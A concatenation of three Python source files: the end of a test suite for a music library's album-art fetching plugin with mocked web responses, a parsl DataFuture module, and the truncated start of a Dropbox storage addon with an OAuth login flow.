"250": "http://coverartarchive.org/release/rid/12345-250.jpg",
"500": "http://coverartarchive.org/release/rid/12345-500.jpg",
"large": "http://coverartarchive.org/release/rid/12345-500.jpg",
"small": "http://coverartarchive.org/release/rid/12345-250.jpg"
},
"types": [
"Front"
]
},
{
"approved": false,
"back": false,
"comment": "",
"edit": 12345,
"front": false,
"id": 12345,
"image": "http://coverartarchive.org/release/rid/12345.jpg",
"thumbnails": {
"1200": "http://coverartarchive.org/release/rid/12345-1200.jpg",
"250": "http://coverartarchive.org/release/rid/12345-250.jpg",
"500": "http://coverartarchive.org/release/rid/12345-500.jpg",
"large": "http://coverartarchive.org/release/rid/12345-500.jpg",
"small": "http://coverartarchive.org/release/rid/12345-250.jpg"
},
"types": [
"Front"
]
}
],
"release": "https://musicbrainz.org/release/releaseid"
}"""
RESPONSE_GROUP = """{
"images": [
{
"approved": false,
"back": false,
"comment": "",
"edit": 12345,
"front": true,
"id": 12345,
"image": "http://coverartarchive.org/release/releaseid/12345.jpg",
"thumbnails": {
"1200": "http://coverartarchive.org/release/rgid/12345-1200.jpg",
"250": "http://coverartarchive.org/release/rgid/12345-250.jpg",
"500": "http://coverartarchive.org/release/rgid/12345-500.jpg",
"large": "http://coverartarchive.org/release/rgid/12345-500.jpg",
"small": "http://coverartarchive.org/release/rgid/12345-250.jpg"
},
"types": [
"Front"
]
}
],
"release": "https://musicbrainz.org/release/release-id"
}"""
def mock_caa_response(self, url, json):
responses.add(responses.GET, url, body=json,
content_type='application/json')
class FetchImageTest(FetchImageHelper, UseThePlugin):
URL = 'http://example.com/test.jpg'
def setUp(self):
super(FetchImageTest, self).setUp()
self.dpath = os.path.join(self.temp_dir, b'arttest')
self.source = fetchart.RemoteArtSource(logger, self.plugin.config)
self.settings = Settings(maxwidth=0)
self.candidate = fetchart.Candidate(logger, url=self.URL)
def test_invalid_type_returns_none(self):
self.mock_response(self.URL, 'image/watercolour')
self.source.fetch_image(self.candidate, self.settings)
self.assertEqual(self.candidate.path, None)
def test_jpeg_type_returns_path(self):
self.mock_response(self.URL, 'image/jpeg')
self.source.fetch_image(self.candidate, self.settings)
self.assertNotEqual(self.candidate.path, None)
def test_extension_set_by_content_type(self):
self.mock_response(self.URL, 'image/png')
self.source.fetch_image(self.candidate, self.settings)
self.assertEqual(os.path.splitext(self.candidate.path)[1], b'.png')
self.assertExists(self.candidate.path)
def test_does_not_rely_on_server_content_type(self):
self.mock_response(self.URL, 'image/jpeg', 'image/png')
self.source.fetch_image(self.candidate, self.settings)
self.assertEqual(os.path.splitext(self.candidate.path)[1], b'.png')
self.assertExists(self.candidate.path)
class FSArtTest(UseThePlugin):
def setUp(self):
super(FSArtTest, self).setUp()
self.dpath = os.path.join(self.temp_dir, b'arttest')
os.mkdir(self.dpath)
self.source = fetchart.FileSystem(logger, self.plugin.config)
self.settings = Settings(cautious=False,
cover_names=('art',))
def test_finds_jpg_in_directory(self):
_common.touch(os.path.join(self.dpath, b'a.jpg'))
candidate = next(self.source.get(None, self.settings, [self.dpath]))
self.assertEqual(candidate.path, os.path.join(self.dpath, b'a.jpg'))
def test_appropriately_named_file_takes_precedence(self):
_common.touch(os.path.join(self.dpath, b'a.jpg'))
_common.touch(os.path.join(self.dpath, b'art.jpg'))
candidate = next(self.source.get(None, self.settings, [self.dpath]))
self.assertEqual(candidate.path, os.path.join(self.dpath, b'art.jpg'))
def test_non_image_file_not_identified(self):
_common.touch(os.path.join(self.dpath, b'a.txt'))
with self.assertRaises(StopIteration):
next(self.source.get(None, self.settings, [self.dpath]))
def test_cautious_skips_fallback(self):
_common.touch(os.path.join(self.dpath, b'a.jpg'))
self.settings.cautious = True
with self.assertRaises(StopIteration):
next(self.source.get(None, self.settings, [self.dpath]))
def test_empty_dir(self):
with self.assertRaises(StopIteration):
next(self.source.get(None, self.settings, [self.dpath]))
def test_precedence_amongst_correct_files(self):
images = [b'front-cover.jpg', b'front.jpg', b'back.jpg']
paths = [os.path.join(self.dpath, i) for i in images]
for p in paths:
_common.touch(p)
self.settings.cover_names = ['cover', 'front', 'back']
candidates = [candidate.path for candidate in
self.source.get(None, self.settings, [self.dpath])]
self.assertEqual(candidates, paths)
class CombinedTest(FetchImageHelper, UseThePlugin, CAAHelper):
ASIN = 'xxxx'
MBID = 'releaseid'
AMAZON_URL = 'https://images.amazon.com/images/P/{0}.01.LZZZZZZZ.jpg' \
.format(ASIN)
AAO_URL = 'https://www.albumart.org/index_detail.php?asin={0}' \
.format(ASIN)
def setUp(self):
super(CombinedTest, self).setUp()
self.dpath = os.path.join(self.temp_dir, b'arttest')
os.mkdir(self.dpath)
def test_main_interface_returns_amazon_art(self):
self.mock_response(self.AMAZON_URL)
album = _common.Bag(asin=self.ASIN)
candidate = self.plugin.art_for_album(album, None)
self.assertIsNotNone(candidate)
def test_main_interface_returns_none_for_missing_asin_and_path(self):
album = _common.Bag()
candidate = self.plugin.art_for_album(album, None)
self.assertIsNone(candidate)
def test_main_interface_gives_precedence_to_fs_art(self):
_common.touch(os.path.join(self.dpath, b'art.jpg'))
self.mock_response(self.AMAZON_URL)
album = _common.Bag(asin=self.ASIN)
candidate = self.plugin.art_for_album(album, [self.dpath])
self.assertIsNotNone(candidate)
self.assertEqual(candidate.path, os.path.join(self.dpath, b'art.jpg'))
def test_main_interface_falls_back_to_amazon(self):
self.mock_response(self.AMAZON_URL)
album = _common.Bag(asin=self.ASIN)
candidate = self.plugin.art_for_album(album, [self.dpath])
self.assertIsNotNone(candidate)
self.assertFalse(candidate.path.startswith(self.dpath))
def test_main_interface_tries_amazon_before_aao(self):
self.mock_response(self.AMAZON_URL)
album = _common.Bag(asin=self.ASIN)
self.plugin.art_for_album(album, [self.dpath])
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.AMAZON_URL)
def test_main_interface_falls_back_to_aao(self):
self.mock_response(self.AMAZON_URL, content_type='text/html')
album = _common.Bag(asin=self.ASIN)
self.plugin.art_for_album(album, [self.dpath])
self.assertEqual(responses.calls[-1].request.url, self.AAO_URL)
def test_main_interface_uses_caa_when_mbid_available(self):
self.mock_caa_response(self.RELEASE_URL, self.RESPONSE_RELEASE)
self.mock_caa_response(self.GROUP_URL, self.RESPONSE_GROUP)
self.mock_response('http://coverartarchive.org/release/rid/12345.gif',
content_type='image/gif')
self.mock_response('http://coverartarchive.org/release/rid/12345.jpg',
content_type='image/jpeg')
album = _common.Bag(mb_albumid=self.MBID_RELEASE,
mb_releasegroupid=self.MBID_GROUP,
asin=self.ASIN)
candidate = self.plugin.art_for_album(album, None)
self.assertIsNotNone(candidate)
self.assertEqual(len(responses.calls), 3)
self.assertEqual(responses.calls[0].request.url, self.RELEASE_URL)
def test_local_only_does_not_access_network(self):
album = _common.Bag(mb_albumid=self.MBID, asin=self.ASIN)
self.plugin.art_for_album(album, None, local_only=True)
self.assertEqual(len(responses.calls), 0)
def test_local_only_gets_fs_image(self):
_common.touch(os.path.join(self.dpath, b'art.jpg'))
album = _common.Bag(mb_albumid=self.MBID, asin=self.ASIN)
candidate = self.plugin.art_for_album(album, [self.dpath],
local_only=True)
self.assertIsNotNone(candidate)
self.assertEqual(candidate.path, os.path.join(self.dpath, b'art.jpg'))
self.assertEqual(len(responses.calls), 0)
class AAOTest(UseThePlugin):
ASIN = 'xxxx'
AAO_URL = 'https://www.albumart.org/index_detail.php?asin={0}'.format(ASIN)
def setUp(self):
super(AAOTest, self).setUp()
self.source = fetchart.AlbumArtOrg(logger, self.plugin.config)
self.settings = Settings()
@responses.activate
def run(self, *args, **kwargs):
super(AAOTest, self).run(*args, **kwargs)
def mock_response(self, url, body):
responses.add(responses.GET, url, body=body, content_type='text/html',
match_querystring=True)
def test_aao_scraper_finds_image(self):
body = """
<br />
<a href=\"TARGET_URL\" title=\"View larger image\"
class=\"thickbox\" style=\"color: #7E9DA2; text-decoration:none;\">
<img src=\"http://www.albumart.org/images/zoom-icon.jpg\"
alt=\"View larger image\" width=\"17\" height=\"15\" border=\"0\"/></a>
"""
self.mock_response(self.AAO_URL, body)
album = _common.Bag(asin=self.ASIN)
candidate = next(self.source.get(album, self.settings, []))
self.assertEqual(candidate.url, 'TARGET_URL')
def test_aao_scraper_returns_no_result_when_no_image_present(self):
self.mock_response(self.AAO_URL, 'blah blah')
album = _common.Bag(asin=self.ASIN)
with self.assertRaises(StopIteration):
next(self.source.get(album, self.settings, []))
class ITunesStoreTest(UseThePlugin):
def setUp(self):
super(ITunesStoreTest, self).setUp()
self.source = fetchart.ITunesStore(logger, self.plugin.config)
self.settings = Settings()
self.album = _common.Bag(albumartist="some artist", album="some album")
@responses.activate
def run(self, *args, **kwargs):
super(ITunesStoreTest, self).run(*args, **kwargs)
def mock_response(self, url, json):
responses.add(responses.GET, url, body=json,
content_type='application/json')
def test_itunesstore_finds_image(self):
json = """{
"results":
[
{
"artistName": "some artist",
"collectionName": "some album",
"artworkUrl100": "url_to_the_image"
}
]
}"""
self.mock_response(fetchart.ITunesStore.API_URL, json)
candidate = next(self.source.get(self.album, self.settings, []))
self.assertEqual(candidate.url, 'url_to_the_image')
self.assertEqual(candidate.match, fetchart.Candidate.MATCH_EXACT)
def test_itunesstore_no_result(self):
json = '{"results": []}'
self.mock_response(fetchart.ITunesStore.API_URL, json)
expected = u"got no results"
with capture_log('beets.test_art') as logs:
with self.assertRaises(StopIteration):
next(self.source.get(self.album, self.settings, []))
self.assertIn(expected, logs[1])
def test_itunesstore_requestexception(self):
responses.add(responses.GET, fetchart.ITunesStore.API_URL,
json={'error': 'not found'}, status=404)
expected = u'iTunes search failed: 404 Client Error'
with capture_log('beets.test_art') as logs:
with self.assertRaises(StopIteration):
next(self.source.get(self.album, self.settings, []))
self.assertIn(expected, logs[1])
def test_itunesstore_fallback_match(self):
json = """{
"results":
[
{
"collectionName": "some album",
"artworkUrl100": "url_to_the_image"
}
]
}"""
self.mock_response(fetchart.ITunesStore.API_URL, json)
candidate = next(self.source.get(self.album, self.settings, []))
self.assertEqual(candidate.url, 'url_to_the_image')
self.assertEqual(candidate.match, fetchart.Candidate.MATCH_FALLBACK)
def test_itunesstore_returns_result_without_artwork(self):
json = """{
"results":
[
{
"artistName": "some artist",
"collectionName": "some album"
}
]
}"""
self.mock_response(fetchart.ITunesStore.API_URL, json)
expected = u'Malformed itunes candidate'
with capture_log('beets.test_art') as logs:
with self.assertRaises(StopIteration):
next(self.source.get(self.album, self.settings, []))
self.assertIn(expected, logs[1])
def test_itunesstore_returns_no_result_when_error_received(self):
json = '{"error": {"errors": [{"reason": "some reason"}]}}'
self.mock_response(fetchart.ITunesStore.API_URL, json)
expected = u"not found in json. Fields are"
with capture_log('beets.test_art') as logs:
with self.assertRaises(StopIteration):
next(self.source.get(self.album, self.settings, []))
self.assertIn(expected, logs[1])
def test_itunesstore_returns_no_result_with_malformed_response(self):
json = """bla blup"""
self.mock_response(fetchart.ITunesStore.API_URL, json)
expected = u"Could not decode json response:"
with capture_log('beets.test_art') as logs:
with self.assertRaises(StopIteration):
next(self.source.get(self.album, self.settings, []))
self.assertIn(expected, logs[1])
class GoogleImageTest(UseThePlugin):
def setUp(self):
super(GoogleImageTest, self).setUp()
self.source = fetchart.GoogleImages(logger, self.plugin.config)
self.settings = Settings()
@responses.activate
def run(self, *args, **kwargs):
super(GoogleImageTest, self).run(*args, **kwargs)
def mock_response(self, url, json):
responses.add(responses.GET, url, body=json,
content_type='application/json')
def test_google_art_finds_image(self):
album = _common.Bag(albumartist="some artist", album="some album")
json = '{"items": [{"link": "url_to_the_image"}]}'
self.mock_response(fetchart.GoogleImages.URL, json)
candidate = next(self.source.get(album, self.settings, []))
self.assertEqual(candidate.url, 'url_to_the_image')
def test_google_art_returns_no_result_when_error_received(self):
album = _common.Bag(albumartist="some artist", album="some album")
json = '{"error": {"errors": [{"reason": "some reason"}]}}'
self.mock_response(fetchart.GoogleImages.URL, json)
with self.assertRaises(StopIteration):
next(self.source.get(album, self.settings, []))
def test_google_art_returns_no_result_with_malformed_response(self):
album = _common.Bag(albumartist="some artist", album="some album")
json = """bla blup"""
self.mock_response(fetchart.GoogleImages.URL, json)
with self.assertRaises(StopIteration):
next(self.source.get(album, self.settings, []))
class CoverArtArchiveTest(UseThePlugin, CAAHelper):
def setUp(self):
super(CoverArtArchiveTest, self).setUp()
self.source = fetchart.CoverArtArchive(logger, self.plugin.config)
self.settings = Settings(maxwidth=0)
@responses.activate
def run(self, *args, **kwargs):
super(CoverArtArchiveTest, self).run(*args, **kwargs)
def test_caa_finds_image(self):
album = _common.Bag(mb_albumid=self.MBID_RELEASE,
mb_releasegroupid=self.MBID_GROUP)
self.mock_caa_response(self.RELEASE_URL, self.RESPONSE_RELEASE)
self.mock_caa_response(self.GROUP_URL, self.RESPONSE_GROUP)
candidates = list(self.source.get(album, self.settings, []))
self.assertEqual(len(candidates), 3)
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[0].request.url, self.RELEASE_URL)
class FanartTVTest(UseThePlugin):
RESPONSE_MULTIPLE = u"""{
"name": "artistname",
"mbid_id": "artistid",
"albums": {
"thereleasegroupid": {
"albumcover": [
{
"id": "24",
"url": "http://example.com/1.jpg",
"likes": "0"
},
{
"id": "42",
"url": "http://example.com/2.jpg",
"likes": "0"
},
{
"id": "23",
"url": "http://example.com/3.jpg",
"likes": "0"
}
],
"cdart": [
{
"id": "123",
"url": "http://example.com/4.jpg",
"likes": "0",
"disc": "1",
"size": "1000"
}
]
}
}
}"""
RESPONSE_NO_ART = u"""{
"name": "artistname",
"mbid_id": "artistid",
"albums": {
"thereleasegroupid": {
"cdart": [
{
"id": "123",
"url": "http://example.com/4.jpg",
"likes": "0",
"disc": "1",
"size": "1000"
}
]
}
}
}"""
RESPONSE_ERROR = u"""{
"status": "error",
"error message": "the error message"
}"""
RESPONSE_MALFORMED = u"bla blup"
def setUp(self):
super(FanartTVTest, self).setUp()
self.source = fetchart.FanartTV(logger, self.plugin.config)
self.settings = Settings()
@responses.activate
def run(self, *args, **kwargs):
super(FanartTVTest, self).run(*args, **kwargs)
def mock_response(self, url, json):
responses.add(responses.GET, url, body=json,
content_type='application/json')
def test_fanarttv_finds_image(self):
album = _common.Bag(mb_releasegroupid=u'thereleasegroupid')
self.mock_response(fetchart.FanartTV.API_ALBUMS + u'thereleasegroupid',
self.RESPONSE_MULTIPLE)
candidate = next(self.source.get(album, self.settings, []))
self.assertEqual(candidate.url, 'http://example.com/1.jpg')
def test_fanarttv_returns_no_result_when_error_received(self):
album = _common.Bag(mb_releasegroupid=u'thereleasegroupid')
self.mock_response(fetchart.FanartTV.API_ALBUMS + u'thereleasegroupid',
self.RESPONSE_ERROR)
with self.assertRaises(StopIteration):
next(self.source.get(album, self.settings, []))
def test_fanarttv_returns_no_result_with_malformed_response(self):
album = _common.Bag(mb_releasegroupid=u'thereleasegroupid')
self.mock_response(fetchart.FanartTV.API_ALBUMS + u'thereleasegroupid',
self.RESPONSE_MALFORMED)
with self.assertRaises(StopIteration):
next(self.source.get(album, self.settings, []))
def test_fanarttv_only_other_images(self):
# The source used to fail when there were images present, but no cover
album = _common.Bag(mb_releasegroupid=u'thereleasegroupid')
self.mock_response(fetchart.FanartTV.API_ALBUMS + u'thereleasegroupid',
self.RESPONSE_NO_ART)
with self.assertRaises(StopIteration):
next(self.source.get(album, self.settings, []))
@_common.slow_test()
class ArtImporterTest(UseThePlugin):
def setUp(self):
super(ArtImporterTest, self).setUp()
# Mock the album art fetcher to always return our test file.
self.art_file = os.path.join(self.temp_dir, b'tmpcover.jpg')
_common.touch(self.art_file)
self.old_afa = self.plugin.art_for_album
self.afa_response = fetchart.Candidate(logger, path=self.art_file)
def art_for_album(i, p, local_only=False):
return self.afa_response
self.plugin.art_for_album = art_for_album
# Test library.
self.libpath = os.path.join(self.temp_dir, b'tmplib.blb')
self.libdir = os.path.join(self.temp_dir, b'tmplib')
os.mkdir(self.libdir)
os.mkdir(os.path.join(self.libdir, b'album'))
itempath = os.path.join(self.libdir, b'album', b'test.mp3')
shutil.copyfile(os.path.join(_common.RSRC, b'full.mp3'), itempath)
self.lib = library.Library(self.libpath)
self.i = _common.item()
self.i.path = itempath
self.album = self.lib.add_album([self.i])
self.lib._connection().commit()
# The import configuration.
self.session = _common.import_session(self.lib)
# Import task for the coroutine.
self.task = importer.ImportTask(None, None, [self.i])
self.task.is_album = True
self.task.album = self.album
info = AlbumInfo(
album=u'some album',
album_id=u'albumid',
artist=u'some artist',
artist_id=u'artistid',
tracks=[],
)
self.task.set_choice(AlbumMatch(0, info, {}, set(), set()))
def tearDown(self):
self.lib._connection().close()
super(ArtImporterTest, self).tearDown()
self.plugin.art_for_album = self.old_afa
def _fetch_art(self, should_exist):
"""Execute the fetch_art coroutine for the task and return the
album's resulting artpath. ``should_exist`` specifies whether to
assert that the art path was set (to the correct value) or that
the path was not set.
"""
# Execute the two relevant parts of the importer.
self.plugin.fetch_art(self.session, self.task)
self.plugin.assign_art(self.session, self.task)
artpath = self.lib.albums()[0].artpath
if should_exist:
self.assertEqual(
artpath,
os.path.join(os.path.dirname(self.i.path), b'cover.jpg')
)
self.assertExists(artpath)
else:
self.assertEqual(artpath, None)
return artpath
def test_fetch_art(self):
assert not self.lib.albums()[0].artpath
self._fetch_art(True)
def test_art_not_found(self):
self.afa_response = None
self._fetch_art(False)
def test_no_art_for_singleton(self):
self.task.is_album = False
self._fetch_art(False)
def test_leave_original_file_in_place(self):
self._fetch_art(True)
self.assertExists(self.art_file)
def test_delete_original_file(self):
self.plugin.src_removed = True
self._fetch_art(True)
self.assertNotExists(self.art_file)
def test_do_not_delete_original_if_already_in_place(self):
artdest = os.path.join(os.path.dirname(self.i.path), b'cover.jpg')
shutil.copyfile(self.art_file, artdest)
self.afa_response = fetchart.Candidate(logger, path=artdest)
self._fetch_art(True)
def test_fetch_art_if_imported_file_deleted(self):
# See #1126. Test the following scenario:
# - Album art imported, `album.artpath` set.
# - Imported album art file subsequently deleted (by user or other
# program).
# `fetchart` should import album art again instead of printing the
# message "<album> has album art".
self._fetch_art(True)
util.remove(self.album.artpath)
self.plugin.batch_fetch_art(self.lib, self.lib.albums(), force=False,
quiet=False)
self.assertExists(self.album.artpath)
class ArtForAlbumTest(UseThePlugin):
""" Tests that fetchart.art_for_album respects the size
configuration (e.g., minwidth, enforce_ratio)
"""
IMG_225x225 = os.path.join(_common.RSRC, b'abbey.jpg')
IMG_348x348 = os.path.join(_common.RSRC, b'abbey-different.jpg')
IMG_500x490 = os.path.join(_common.RSRC, b'abbey-similar.jpg')
def setUp(self):
super(ArtForAlbumTest, self).setUp()
self.old_fs_source_get = fetchart.FileSystem.get
def fs_source_get(_self, album, settings, paths):
if paths:
yield fetchart.Candidate(logger, path=self.image_file)
fetchart.FileSystem.get = fs_source_get
self.album = _common.Bag()
def tearDown(self):
fetchart.FileSystem.get = self.old_fs_source_get
super(ArtForAlbumTest, self).tearDown()
def _assertImageIsValidArt(self, image_file, should_exist): # noqa
self.assertExists(image_file)
self.image_file = image_file
candidate = self.plugin.art_for_album(self.album, [''], True)
if should_exist:
self.assertNotEqual(candidate, None)
self.assertEqual(candidate.path, self.image_file)
self.assertExists(candidate.path)
else:
self.assertIsNone(candidate)
def _assertImageResized(self, image_file, should_resize): # noqa
self.image_file = image_file
with patch.object(ArtResizer.shared, 'resize') as mock_resize:
self.plugin.art_for_album(self.album, [''], True)
self.assertEqual(mock_resize.called, should_resize)
def _require_backend(self):
"""Skip the test if the art resizer doesn't have ImageMagick or
PIL (so comparisons and measurements are unavailable).
"""
if ArtResizer.shared.method[0] == WEBPROXY:
self.skipTest(u"ArtResizer has no local imaging backend available")
def test_respect_minwidth(self):
self._require_backend()
self.plugin.minwidth = 300
self._assertImageIsValidArt(self.IMG_225x225, False)
self._assertImageIsValidArt(self.IMG_348x348, True)
def test_respect_enforce_ratio_yes(self):
self._require_backend()
self.plugin.enforce_ratio = True
self._assertImageIsValidArt(self.IMG_500x490, False)
self._assertImageIsValidArt(self.IMG_225x225, True)
def test_respect_enforce_ratio_no(self):
self.plugin.enforce_ratio = False
self._assertImageIsValidArt(self.IMG_500x490, True)
def test_respect_enforce_ratio_px_above(self):
self._require_backend()
self.plugin.enforce_ratio = True
self.plugin.margin_px = 5
self._assertImageIsValidArt(self.IMG_500x490, False)
def test_respect_enforce_ratio_px_below(self):
self._require_backend()
self.plugin.enforce_ratio = True
self.plugin.margin_px = 15
self._assertImageIsValidArt(self.IMG_500x490, True)
def test_respect_enforce_ratio_percent_above(self):
self._require_backend()
self.plugin.enforce_ratio = True
self.plugin.margin_percent = (500 - 490) / 500 * 0.5
self._assertImageIsValidArt(self.IMG_500x490, False)
def test_respect_enforce_ratio_percent_below(self):
self._require_backend()
self.plugin.enforce_ratio = True
self.plugin.margin_percent = (500 - 490) / 500 * 1.5
self._assertImageIsValidArt(self.IMG_500x490, True)
def test_resize_if_necessary(self):
self._require_backend()
self.plugin.maxwidth = 300
self._assertImageResized(self.IMG_225x225, False)
self._assertImageResized(self.IMG_348x348, True)
class DeprecatedConfigTest(_common.TestCase):
"""While refactoring the plugin, the remote_priority option was deprecated,
and a new codepath should translate its effect. Check that it actually does
so.
"""
# If we subclassed UseThePlugin, the configuration change would either be
# overwritten by _common.TestCase or be set after constructing the
# plugin object
def setUp(self):
super(DeprecatedConfigTest, self).setUp()
config['fetchart']['remote_priority'] = True
self.plugin = fetchart.FetchArtPlugin()
def test_moves_filesystem_to_end(self):
self.assertEqual(type(self.plugin.sources[-1]), fetchart.FileSystem)
class EnforceRatioConfigTest(_common.TestCase):
"""Throw some data at the regexes."""
def _load_with_config(self, values, should_raise):
if should_raise:
for v in values:
config['fetchart']['enforce_ratio'] = v
with self.assertRaises(confuse.ConfigValueError):
fetchart.FetchArtPlugin()
else:
for v in values:
config['fetchart']['enforce_ratio'] = v
fetchart.FetchArtPlugin()
def test_px(self):
self._load_with_config(u'0px 4px 12px 123px'.split(), False)
self._load_with_config(u'00px stuff5px'.split(), True)
def test_percent(self):
self._load_with_config(u'0% 0.00% 5.1% 5% 100%'.split(), False)
self._load_with_config(u'00% 1.234% foo5% 100.1%'.split(), True)
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
|
"""This module implements DataFutures.
We have two basic types of futures:
1. DataFutures which represent data objects
2. AppFutures which represent the futures on App/Leaf tasks.
"""
import os
import logging
from concurrent.futures import Future
from parsl.dataflow.futures import AppFuture
from parsl.app.errors import NotFutureError
from parsl.data_provider.files import File
logger = logging.getLogger(__name__)
# Possible future states (for internal use by the futures package).
PENDING = 'PENDING'
RUNNING = 'RUNNING'
# The future was cancelled by the user...
CANCELLED = 'CANCELLED'
# ...and _Waiter.add_cancelled() was called by a worker.
CANCELLED_AND_NOTIFIED = 'CANCELLED_AND_NOTIFIED'
FINISHED = 'FINISHED'
_STATE_TO_DESCRIPTION_MAP = {
PENDING: "pending",
RUNNING: "running",
CANCELLED: "cancelled",
CANCELLED_AND_NOTIFIED: "cancelled",
FINISHED: "finished"
}
class DataFuture(Future):
"""A datafuture points at an AppFuture.
We simply wrap an AppFuture and add the specific case where, if the
future is resolved (i.e. the file exists), then the DataFuture is
assumed to be resolved.
"""
def parent_callback(self, parent_fu):
"""Callback from executor future to update the parent.
Args:
- parent_fu (Future): Future returned by the executor along with callback
Returns:
- None
Updates the super() with the result() or exception()
"""
if parent_fu.done() is True:
e = parent_fu._exception
if e:
super().set_exception(e)
else:
super().set_result(parent_fu.result())
return
def __init__(self, fut, file_obj, parent=None, tid=None):
"""Construct the DataFuture object.
If the file_obj is a string convert to a File.
Args:
- fut (AppFuture) : AppFuture that this DataFuture will track
- file_obj (string/File obj) : Something representing file(s)
Kwargs:
- parent ()
- tid (task_id) : Task id that this DataFuture tracks
"""
super().__init__()
self._tid = tid
if isinstance(file_obj, str) and not isinstance(file_obj, File):
self.file_obj = File(file_obj)
else:
self.file_obj = file_obj
self.parent = parent
self._exception = None
if fut is None:
logger.debug("Setting result to filepath since no future was passed")
self.set_result(self.file_obj)
else:
if isinstance(fut, Future):
self.parent = fut
self.parent.add_done_callback(self.parent_callback)
else:
raise NotFutureError("DataFuture can be created only with a FunctionFuture or None")
logger.debug("Creating DataFuture with parent: %s", parent)
logger.debug("Filepath: %s", self.filepath)
@property
def tid(self):
"""Returns the task_id of the task that will resolve this DataFuture."""
return self._tid
@property
def filepath(self):
"""Filepath of the File object this datafuture represents."""
return self.file_obj.filepath
@property
def filename(self):
"""Filepath of the File object this datafuture represents."""
return self.filepath
def result(self, timeout=None):
"""A blocking call that returns either the result or raises an exception.
Assumptions: A DataFuture always has a parent AppFuture, and the
AppFuture invokes our registered callback when it completes.
Kwargs:
- timeout (int): Timeout in seconds
Returns:
- If App completed successfully returns the filepath.
Raises:
- Exception raised by app if failed.
"""
if self.parent:
if self.parent.done():
# This explicit raise might be redundant: the result() call below
# *should* raise the exception if there is one.
e = self.parent._exception
if e:
raise e
else:
self.parent.result(timeout=timeout)
else:
self.parent.result(timeout=timeout)
return self.file_obj
def cancel(self):
"""Cancel the task that this DataFuture is tracking.
Note: This may not work
"""
if self.parent:
return self.parent.cancel()
else:
return False
def cancelled(self):
if self.parent:
return self.parent.cancelled()
else:
return False
def running(self):
if self.parent:
return self.parent.running()
else:
return False
def done(self):
if self.parent:
return self.parent.done()
else:
return True
def exception(self, timeout=None):
if self.parent:
return self.parent.exception(timeout=timeout)
else:
return None
def add_done_callback(self, fn):
if self.parent:
return self.parent.add_done_callback(fn)
else:
raise ValueError("Callback will be discarded because no parent future")
def __repr__(self):
# The DataFuture could be wrapping an AppFuture whose parent is a Future
# check to find the top level parent
if isinstance(self.parent, AppFuture):
parent = self.parent.parent
else:
parent = self.parent
if parent:
with parent._condition:
if parent._state == FINISHED:
if parent._exception:
return '<%s at %#x state=%s raised %s>' % (
self.__class__.__name__,
id(self),
_STATE_TO_DESCRIPTION_MAP[parent._state],
parent._exception.__class__.__name__)
else:
return '<%s at %#x state=%s returned %s>' % (
self.__class__.__name__,
id(self),
_STATE_TO_DESCRIPTION_MAP[parent._state],
self.filepath)
return '<%s at %#x state=%s>' % (
self.__class__.__name__,
id(self),
_STATE_TO_DESCRIPTION_MAP[parent._state])
else:
return '<%s at %#x state=%s>' % (
self.__class__.__name__,
id(self),
_STATE_TO_DESCRIPTION_MAP[self._state])
def testing_nonfuture():
fpath = '~/shuffled.txt'
df = DataFuture(None, fpath)
print(df)
print("Result: ", df.filepath)
assert df.filepath == os.path.abspath(os.path.expanduser(fpath))
if __name__ == "__main__":
# logging.basicConfig(filename='futures.testing.log',level=logging.DEBUG)
import sys
import random
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logger.debug("Begin Testing")
with open('shuffled.txt', 'w') as testfile:
nums = list(range(0, 10000))
random.shuffle(nums)
for item in nums:
testfile.write("{0}\n".format(item))
foo = Future()
df = DataFuture(foo, './shuffled.txt')
dx = DataFuture(foo, '~/shuffled.txt')
print(foo.done())
print(df.done())
testing_nonfuture()
|
|
from rest_framework import status as http_status
import logging
import os
from oauthlib.common import generate_token
from addons.base.models import (BaseOAuthNodeSettings, BaseOAuthUserSettings,
BaseStorageAddon)
from django.db import models
from dropbox.dropbox import Dropbox
from dropbox.exceptions import ApiError, DropboxException
from dropbox.files import FolderMetadata
from dropbox import DropboxOAuth2Flow, oauth
from flask import request
from framework.auth import Auth
from framework.exceptions import HTTPError
from framework.sessions import session
from osf.models.external import ExternalProvider
from osf.models.files import File, Folder, BaseFileNode
from addons.base import exceptions
from addons.dropbox import settings
from addons.dropbox.serializer import DropboxSerializer
from website.util import api_v2_url, web_url_for
logger = logging.getLogger(__name__)
class DropboxFileNode(BaseFileNode):
_provider = 'dropbox'
class DropboxFolder(DropboxFileNode, Folder):
pass
class DropboxFile(DropboxFileNode, File):
@property
def _hashes(self):
try:
return {'Dropbox content_hash': self._history[-1]['extra']['hashes']['dropbox']}
except (IndexError, KeyError):
return None
class Provider(ExternalProvider):
name = 'Dropbox'
short_name = 'dropbox'
client_id = settings.DROPBOX_KEY
client_secret = settings.DROPBOX_SECRET
# Explicitly override auth_url_base as None -- DropboxOAuth2Flow handles this for us
auth_url_base = None
callback_url = None
handle_callback = None
@property
def oauth_flow(self):
if 'oauth_states' not in session.data:
session.data['oauth_states'] = {}
if self.short_name not in session.data['oauth_states']:
session.data['oauth_states'][self.short_name] = {
'state': generate_token()
}
return DropboxOAuth2Flow(
self.client_id,
self.client_secret,
redirect_uri=web_url_for(
'oauth_callback',
service_name=self.short_name,
_absolute=True
),
session=session.data['oauth_states'][self.short_name], csrf_token_session_key='state'
)
@property
def auth_url(self):
ret = self.oauth_flow.start('force_reapprove=true')
session.save()
return ret
# Overrides ExternalProvider
def auth_callback(self, user):
# TODO: consider not using client library during auth flow
try:
access_token = self.oauth_flow.finish(request.values).access_token
except (oauth.NotApprovedException, oauth.BadStateException):
# 1) user cancelled and client library raised exc., or
# 2) the state was manipulated, possibly due to time.
# Either way, return and display info about how to properly connect.
return
except (oauth.ProviderException, oauth.CsrfException):
raise HTTPError(http_status.HTTP_403_FORBIDDEN)
except oauth.BadRequestException:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
self.client = Dropbox(access_token)
info = self.client.users_get_current_account()
return self._set_external_account(
user,
{
'key': access_token,
'provider_id': info.account_id,
'display_name': info.name.display_name,
}
)
class UserSettings(BaseOAuthUserSettings):
"""Stores user-specific dropbox information.
token.
"""
oauth_provider = Provider
serializer = DropboxSerializer
def revoke_remote_oauth_access(self, external_account):
"""Overrides default behavior during external_account deactivation.
Tells Dropbox to remove the grant for the OSF associated with this account.
"""
